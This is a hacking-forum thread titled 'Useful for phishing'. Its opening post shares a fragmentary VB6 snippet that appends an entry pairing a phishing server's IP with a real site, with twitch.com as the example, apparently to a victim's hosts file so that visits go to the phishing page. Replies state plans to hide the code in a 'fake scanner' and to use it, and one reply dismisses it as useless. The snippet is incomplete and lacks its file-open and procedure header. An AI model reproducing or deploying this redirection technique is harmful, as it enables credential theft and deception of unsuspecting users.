Login Register


Useful for phishing filter_list
Author
Message
Useful for phishing #1
Option Explicit

Dim Text As String

Text = (vbNewLine & "phishingsiteip twitchwebsiteurl")
' Here above you can add more sites that will be filtered / redirected
' Note: you need dedicated IP on your phishing website to make this work.
' example: (vbNewLine & "121.124.42.1 twitch.com")  the IP will be the dedicated IP of your phishing website.
Print #1, Text
Close #1
End Sub




' you can make this also for other websites.

Reply

RE: Useful for phishing #2
Awesome. i'll make a fake scanner that runs this code.
Is it vb6?

Reply

RE: Useful for phishing #3
Thanks for this holy heck, Im going to actually use this
[Image: SouZ0uz.gif]

Reply

RE: Useful for phishing #4
This is more useless than the hello world program.
- mostly braindead monkeys on this forum.

Reply







Users browsing this thread: 1 Guest(s)